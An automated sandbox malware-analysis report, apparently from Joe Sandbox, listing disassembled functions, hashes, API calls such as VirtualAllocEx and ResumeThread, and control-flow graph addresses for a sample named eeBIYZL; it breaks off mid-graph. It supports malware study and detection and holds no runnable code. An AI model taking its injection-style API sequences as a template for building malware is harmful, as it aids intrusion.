                                  • Instruction ID: 932b1f1d4a13237c45e4a002cadfae85480bc7a41dc0c3f97bf0dc7a42578c94
                                  • Opcode Fuzzy Hash: 8682b6947b9871f585efd1ac318f04f527220d9e04615a89ccd78eae31e42886
                                  • Instruction Fuzzy Hash: 171129718042499FDB20DFAAD845AEFBFF5FF48310F14841AE519A7250C7759944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009FB9E1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009FB841,00000800,00000000,00000000), ref: 009FBA52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: bb16e6465d3e205e953970bcb3ffa11e79ea0d0aea348ac62376d39a0f123674
                                  • Instruction ID: fec6928fee0cbcea46418d08ac1a4ba26bd7dbafce82d5f59104995a0b4b1f75
                                  • Opcode Fuzzy Hash: bb16e6465d3e205e953970bcb3ffa11e79ea0d0aea348ac62376d39a0f123674
                                  • Instruction Fuzzy Hash: 981114B6C003489FDB20CFAAD484AEEFBF5AF48310F14842ED519A7200C379A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CF68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502CFD6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d802ecc9c9403e02badebc48b4fea277bb59552938407a5634bfd481689ad4c4
                                  • Instruction ID: 6d78b6fdb8029dd77d95a355e552678a67060c2405ee13226938a4167951f74f
                                  • Opcode Fuzzy Hash: d802ecc9c9403e02badebc48b4fea277bb59552938407a5634bfd481689ad4c4
                                  • Instruction Fuzzy Hash: 0C1149718042499FDB10DFAAD845AEFBFF5FF48320F108419E519A7250C779A940CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CDD8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 28582eddae5ee12c41801bcb0deab2e45d9aeb948ea7d57b38ac8bb1c73c778a
                                  • Instruction ID: fb11bb61c0f526c54912847c0e66194f7369ad1a4ca160f3a95bf5661f7449f6
                                  • Opcode Fuzzy Hash: 28582eddae5ee12c41801bcb0deab2e45d9aeb948ea7d57b38ac8bb1c73c778a
                                  • Instruction Fuzzy Hash: B01146B1D002488EDB20DFAAD4447EEBBF5BF88324F20841AD519A7240C7799944CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0502CDE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 67397314cd9639423acb97dc345b3f8b543b49a94d556c97d6385dc7b4f38a13
                                  • Instruction ID: ac90e2fdfa40efb95ac51986c6789a8d69e9d162e021bb02f2813f31f1211642
                                  • Opcode Fuzzy Hash: 67397314cd9639423acb97dc345b3f8b543b49a94d556c97d6385dc7b4f38a13
                                  • Instruction Fuzzy Hash: B81125B19003488BDB20DFAAD4457AEFBF5FF88324F20841AD519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009FB760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB7C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 04566d4dd82d2b48f6bba2b3741427b13f18c0a97c955956ed8034d7d63d0587
                                  • Instruction ID: 850c1db8bf26023c8772c33e2c6b7265f5d42af47a5577796be907a1b29bcd6c
                                  • Opcode Fuzzy Hash: 04566d4dd82d2b48f6bba2b3741427b13f18c0a97c955956ed8034d7d63d0587
                                  • Instruction Fuzzy Hash: 2E11DFB5C007498FCB20DF9AD444AAEFBF9AF89320F10842AD519A7610D379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 087211F8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0872125D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2136712621.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_8720000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 1b79c224a8252d459c344b9d0a6b25c89e044d818865a0747035a6337a101f45
                                  • Instruction ID: e6e5ebb340d9222b056f9ad4d2ea0c738ce17edeefad433ffb61941a82b9dbb0
                                  • Opcode Fuzzy Hash: 1b79c224a8252d459c344b9d0a6b25c89e044d818865a0747035a6337a101f45
                                  • Instruction Fuzzy Hash: 8011E3B58002599ECB10DF9AD485BDEBBF4FB48320F20851AE569A7250C379A984CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08721200 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0872125D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2136712621.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_8720000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 6a3885970576955f866179eae37e495e9765d436778544995140eef6002e9b73
                                  • Instruction ID: cacb8fe2cc15dbb3280e9f1f5756b5255923346c0440f1823438a7fa96b8eb41
                                  • Opcode Fuzzy Hash: 6a3885970576955f866179eae37e495e9765d436778544995140eef6002e9b73
                                  • Instruction Fuzzy Hash: FA11C2B5800349DFDB10DF9AD585BDEBBF8FB48310F10841AE558A7200D379A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D1FC Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03bd7d69ff975eb08278ab36c51e3b88cc2b1d03505d6bfa56551d5c4e7674f6
                                  • Instruction ID: 33910af5534064334df92044582ea0c19dc105be7e5def89ec23435e64e2f330
                                  • Opcode Fuzzy Hash: 03bd7d69ff975eb08278ab36c51e3b88cc2b1d03505d6bfa56551d5c4e7674f6
                                  • Instruction Fuzzy Hash: D4210071500304DFCB058F14D9C0B66BFA9FF88314F20C669E9198B256C33AE896CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
                                  • Instruction ID: 81652b32e922e98221dcc66ee224107a80298dcf18517d9cd08fda89a4bb3187
                                  • Opcode Fuzzy Hash: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
                                  • Instruction Fuzzy Hash: C6210371500344DFCB15DF14D9C0FA6BF6AFF98318F20C569E9098B256C33AD896DAA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0082D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126369315.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_82d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
                                  • Instruction ID: 43c37240f04e6e57a935ea32a25c6d08cb8674c31678e96dc031119080ffc464
                                  • Opcode Fuzzy Hash: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
                                  • Instruction Fuzzy Hash: A621F571504304EFDB05DF14E5C0B26BFA5FB84314F20C56DD9098B256C33AE886CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0082D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126369315.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_82d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
                                  • Instruction ID: 30abcd788c9932c1e5cc79f476fac0539ba3662b6b64205c15688cf5262c7a65
                                  • Opcode Fuzzy Hash: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
                                  • Instruction Fuzzy Hash: 3A21F271604744DFCB14DF24E984B26BF65FB88314F20C569D94A8B3A6C33AD887CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D1F7 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                  • Instruction ID: 36fac97b5fb31904cfbbff897345abb832c4eb2dc415f164e6ba0625cc017f02
                                  • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                  • Instruction Fuzzy Hash: 4621CD76404240CFCB06CF00D9C4B56BF62FF88310F24C6A9DD084B656C33AE86ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 8dc1ce435c2f61966a31dc9f64e3bd0faa854ae5e06481acf88cd0d81c4908ad
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: 2611DF72404280CFCB06CF10D5C4B96BF72FB98314F24C6A9D8494B256C336D85ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0082D017 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126369315.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_82d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: b8d386ea37286f8ca44eef2ad48a249ccd98d9364c9f1a8cbd729bcb213b2675
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: BB118E75504780DFDB15CF14E5C4B15BF61FB44314F24C6A9D8498B666C33AD84ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0082D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126369315.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_82d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 37858e9299bb3ee5ea3b2c6b8e946a08a5aeebca685a259554d6677c12e1fd08
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 3A118B75504380DFDB16CF14D5C4B15BFA2FB84314F24C6A9D8498B696C33AE84ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a967b621a6c9d57be5c2ec829f762796ac4973c6b0af45bbd74bf36815abbf6
                                  • Instruction ID: ca68105839c6a8b7895fc3537d9f002d8e86e6c6660af6f6315f9663a70b1189
                                  • Opcode Fuzzy Hash: 1a967b621a6c9d57be5c2ec829f762796ac4973c6b0af45bbd74bf36815abbf6
                                  • Instruction Fuzzy Hash: CB01DB710053449AE7209E15CD84BA7FFDCFF45324F18CD2AED098A2C6D2799881CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0081D744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2126202748.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_81d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57940764fed5862893450ca70f4595e7b5bb5f0ac2e6708b49dd3c9587af8bdf
                                  • Instruction ID: 2a98092bfd279092909c19bc0f05dfc46b93cb12f72f6134916550faf7a3186b
                                  • Opcode Fuzzy Hash: 57940764fed5862893450ca70f4595e7b5bb5f0ac2e6708b49dd3c9587af8bdf
                                  • Instruction Fuzzy Hash: 42F06271404344AAE7109E16C888BA6FFDCFF55734F18C85AED484A286C2799844CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:9.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:62
                                  Total number of Limit Nodes:6
                                  execution_graph 41033 2c60848 41035 2c6084e 41033->41035 41034 2c6091b 41035->41034 41038 2c614b7 41035->41038 41049 2c6138f 41035->41049 41040 2c613a6 41038->41040 41041 2c614bb 41038->41041 41039 2c614b4 41039->41035 41040->41039 41042 2c614b7 2 API calls 41040->41042 41059 2c68348 41040->41059 41064 2c67e98 41040->41064 41069 2c68061 41040->41069 41074 2c68002 41040->41074 41079 2c67fc4 41040->41079 41084 2c67e87 41040->41084 41041->41035 41042->41040 41050 2c61372 41049->41050 41051 2c61393 41049->41051 41050->41035 41051->41050 41052 2c614b7 2 API calls 41051->41052 41053 2c68348 GlobalMemoryStatusEx 41051->41053 41054 2c67e87 DeleteFileW 41051->41054 41055 2c67fc4 DeleteFileW 41051->41055 41056 2c68002 DeleteFileW 41051->41056 41057 2c68061 DeleteFileW 41051->41057 41058 2c67e98 DeleteFileW 41051->41058 41052->41051 41053->41051 41054->41051 41055->41051 41056->41051 41057->41051 41058->41051 41060 2c68352 41059->41060 41061 2c6836c 41060->41061 41089 6a7fa00 41060->41089 41093 6a7f9ef 41060->41093 41061->41040 41066 2c67eb1 41064->41066 41065 2c680f3 41065->41040 41066->41065 41097 2c68110 41066->41097 41101 2c68101 41066->41101 41071 2c68066 41069->41071 41070 2c680f3 41070->41040 41072 2c68110 DeleteFileW 41071->41072 41073 2c68101 DeleteFileW 41071->41073 41072->41070 41073->41070 41076 2c68007 41074->41076 41075 2c680f3 41075->41040 41077 2c68110 DeleteFileW 41076->41077 41078 2c68101 DeleteFileW 41076->41078 41077->41075 41078->41075 41081 2c67fc9 41079->41081 41080 2c680f3 41080->41040 41082 2c68110 DeleteFileW 41081->41082 41083 2c68101 DeleteFileW 41081->41083 41082->41080 41083->41080 41086 2c67e98 41084->41086 41085 2c680f3 41085->41040 41086->41085 41087 2c68110 DeleteFileW 41086->41087 41088 2c68101 DeleteFileW 41086->41088 41087->41085 41088->41085 41090 6a7fa15 41089->41090 41091 6a7fc26 41090->41091 41092 6a7fc41 GlobalMemoryStatusEx 41090->41092 41091->41061 41092->41090 41094 6a7fa15 41093->41094 41095 6a7fc26 41094->41095 41096 6a7fc41 GlobalMemoryStatusEx 41094->41096 41095->41061 41096->41094 41098 2c68120 41097->41098 41099 2c68152 41098->41099 41105 2c6781c 41098->41105 41099->41065 41102 2c68120 41101->41102 41103 2c68152 41102->41103 41104 2c6781c DeleteFileW 41102->41104 41103->41065 41104->41103 41106 2c68170 DeleteFileW 41105->41106 41108 2c681ef 41106->41108 41108->41099

                                  Executed Functions

                                  Function 06A72750 Relevance: 9.0, Strings: 6, Instructions: 1479COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 6acc1ca712890098d0eab448b5bd830a8f3b444f049a8e293db9734f4ff7ca10
                                  • Instruction ID: 0a7ed2e706422115f8ffc62b5bbe4513066122f292e3610927bbec2d4964c12e
                                  • Opcode Fuzzy Hash: 6acc1ca712890098d0eab448b5bd830a8f3b444f049a8e293db9734f4ff7ca10
                                  • Instruction Fuzzy Hash: 71D27A30E00619CFDB64EF68C984A9DB7B2FF89300F5585A9D449AF265DB31ED85CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7B1F8 Relevance: 8.3, Strings: 6, Instructions: 761COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: c8ced2ef6557769ac0a73b91054804f4ab2b049bc6fb95cc53f88aa26b99c49f
                                  • Instruction ID: 6cad462988ef9dc65331f49dc082d5cce14f86f8beaad58cc772b40a00d3a380
                                  • Opcode Fuzzy Hash: c8ced2ef6557769ac0a73b91054804f4ab2b049bc6fb95cc53f88aa26b99c49f
                                  • Instruction Fuzzy Hash: 44525EB0E002098FDF64EF69D9907AEB7B6EB85310F208529D415DB395DB34EC85CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A77D48 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1759 6a77d48-6a77d66 1760 6a77d68-6a77d6b 1759->1760 1761 6a77d6d-6a77d87 1760->1761 1762 6a77d8c-6a77d8f 1760->1762 1761->1762 1763 6a77db2-6a77db5 1762->1763 1764 6a77d91-6a77dad 1762->1764 1766 6a77db7-6a77dc1 1763->1766 1767 6a77dc2-6a77dc5 1763->1767 1764->1763 1769 6a77dc7-6a77dd5 1767->1769 1770 6a77ddc-6a77dde 1767->1770 1776 6a77dee-6a77e04 1769->1776 1777 6a77dd7 1769->1777 1773 6a77de5-6a77de8 1770->1773 1774 6a77de0 1770->1774 1773->1760 1773->1776 1774->1773 1780 6a7801f-6a78029 1776->1780 1781 6a77e0a-6a77e13 1776->1781 1777->1770 1782 6a7802a-6a78034 1781->1782 1783 6a77e19-6a77e36 1781->1783 1786 6a78036-6a7805f 1782->1786 1787 6a7808b-6a78096 1782->1787 1790 6a7800c-6a78019 1783->1790 1791 6a77e3c-6a77e64 1783->1791 1789 6a78061-6a78064 1786->1789 1797 6a7807b-6a78088 1787->1797 1798 6a78098-6a780dc 1787->1798 1792 6a7806a-6a78079 1789->1792 1793 6a78299-6a7829c 1789->1793 1790->1780 1790->1781 1791->1790 1814 6a77e6a-6a77e73 1791->1814 1792->1797 1792->1798 1795 6a782bf-6a782c2 1793->1795 1796 6a7829e-6a782ba 1793->1796 1800 6a7836d-6a7836f 1795->1800 1801 6a782c8-6a782d4 1795->1801 1796->1795 1797->1787 1808 6a780e2-6a780f3 1798->1808 1809 6a7826d-6a78283 1798->1809 1804 6a78376-6a78379 1800->1804 1805 6a78371 1800->1805 1812 6a782df-6a782e1 1801->1812 1804->1789 1810 6a7837f-6a78388 1804->1810 1805->1804 1824 6a780f9-6a78116 1808->1824 1825 6a78258-6a78267 1808->1825 1809->1793 1815 6a782e3-6a782e9 1812->1815 1816 6a782f9-6a782fd 1812->1816 1814->1782 1819 6a77e79-6a77e95 1814->1819 1820 6a782ed-6a782ef 1815->1820 1821 6a782eb 1815->1821 1822 6a782ff-6a78309 1816->1822 1823 6a7830b 1816->1823 1833 6a77e9b-6a77ec5 1819->1833 1834 6a77ffa-6a78006 1819->1834 1820->1816 1821->1816 1826 6a78310-6a78312 1822->1826 1823->1826 1824->1825 1838 6a7811c-6a78212 call 6a76578 1824->1838 1825->1808 1825->1809 1829 6a78314-6a78317 1826->1829 1830 6a78323-6a7835c 1826->1830 1829->1810 1830->1792 1848 6a78362-6a7836c 1830->1848 1845 6a77ff0-6a77ff5 1833->1845 1846 6a77ecb-6a77ef3 1833->1846 1834->1790 1834->1814 1895 6a78214-6a7821e 1838->1895 1896 6a78220 1838->1896 1845->1834 1846->1845 1854 6a77ef9-6a77f27 1846->1854 1854->1845 1860 6a77f2d-6a77f36 1854->1860 1860->1845 1861 6a77f3c-6a77f6e 1860->1861 1868 6a77f70-6a77f74 1861->1868 1869 6a77f79-6a77f95 1861->1869 1868->1845 1871 6a77f76 1868->1871 1869->1834 1872 6a77f97-6a77fee call 6a76578 1869->1872 1871->1869 1872->1834 1897 6a78225-6a78227 1895->1897 1896->1897 1897->1825 1898 6a78229-6a7822e 1897->1898 1899 6a78230-6a7823a 1898->1899 1900 6a7823c 1898->1900 1901 6a78241-6a78243 1899->1901 1900->1901 1901->1825 1902 6a78245-6a78251 1901->1902 1902->1825
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 9d046824520fff70db124f375692ea6224d16ea88576bee696d530b805b924db
                                  • Instruction ID: 2c30bf2455f3db7f066ffd28d1aff8313b9727a2258b8b08a8f2d72481c3f5eb
                                  • Opcode Fuzzy Hash: 9d046824520fff70db124f375692ea6224d16ea88576bee696d530b805b924db
                                  • Instruction Fuzzy Hash: 64029D30B002198FDB64EB69D994AAEB7F6FF84300F248569D815DB395DB35EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A75568 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2237 6a75568-6a75585 2238 6a75587-6a7558a 2237->2238 2239 6a7558c-6a75593 2238->2239 2240 6a75598-6a7559b 2238->2240 2239->2240 2241 6a755ae-6a755b1 2240->2241 2242 6a7559d-6a755a3 2240->2242 2245 6a755b3-6a755b4 2241->2245 2246 6a755b9-6a755bc 2241->2246 2243 6a756c4-6a756d2 2242->2243 2244 6a755a9 2242->2244 2253 6a756d9-6a756dc 2243->2253 2244->2241 2245->2246 2247 6a755be-6a755c2 2246->2247 2248 6a755cd-6a755d0 2246->2248 2249 6a75734-6a75740 2247->2249 2250 6a755c8 2247->2250 2251 6a75605-6a75608 2248->2251 2252 6a755d2-6a755d5 2248->2252 2250->2248 2257 6a7560f-6a75612 2251->2257 2258 6a7560a-6a7560c 2251->2258 2254 6a75741-6a7576b 2252->2254 2255 6a755db-6a755e6 2252->2255 2256 6a756e1-6a756e4 2253->2256 2276 6a75775-6a75778 2254->2276 2255->2254 2259 6a755ec-6a755f6 2255->2259 2260 6a756e6-6a756f6 2256->2260 2261 6a756fb-6a756fe 2256->2261 2257->2242 2262 6a75614-6a75617 2257->2262 2258->2257 2259->2254 2263 6a755fc-6a75600 2259->2263 2260->2261 2267 6a75722-6a75724 2261->2267 2268 6a75700-6a7571d 2261->2268 2265 6a7562e-6a75631 2262->2265 2266 6a75619-6a75629 2262->2266 2263->2251 2272 6a75633-6a75636 2265->2272 2273 6a7563b-6a7563e 2265->2273 2266->2265 2269 6a75726 2267->2269 2270 6a7572b-6a7572e 2267->2270 2268->2267 2269->2270 2270->2238 2270->2249 2272->2273 2274 6a75640-6a75646 2273->2274 2275 6a7564d-6a75650 2273->2275 2274->2252 2279 6a75648 2274->2279 2275->2274 2280 6a75652-6a75655 2275->2280 2281 6a7579a-6a7579d 2276->2281 2282 6a7577a-6a7577e 2276->2282 2279->2275 2283 6a75657-6a7565a 2280->2283 2284 6a7565f-6a75662 2280->2284 2287 6a7579f-6a757a9 2281->2287 2288 6a757ae-6a757b1 2281->2288 2285 6a75866-6a758a4 2282->2285 2286 6a75784-6a7578c 2282->2286 2283->2284 2292 6a75664-6a7566a 2284->2292 2293 6a75671-6a75674 2284->2293 2307 6a758a6-6a758a9 2285->2307 2286->2285 2294 6a75792-6a75795 2286->2294 2287->2288 2290 6a757d3-6a757d6 2288->2290 2291 6a757b3-6a757b7 2288->2291 2296 6a757f4-6a757f7 2290->2296 2297 6a757d8-6a757dc 2290->2297 2291->2285 2295 6a757bd-6a757c5 2291->2295 2292->2283 2298 6a7566c 2292->2298 2299 6a75676-6a7568c 2293->2299 2300 6a75691-6a75694 2293->2300 2294->2281 2295->2285 2303 6a757cb-6a757ce 2295->2303 2305 6a75807-6a7580a 2296->2305 2306 6a757f9-6a75800 2296->2306 2297->2285 2304 6a757e2-6a757ea 2297->2304 2298->2293 2299->2300 2308 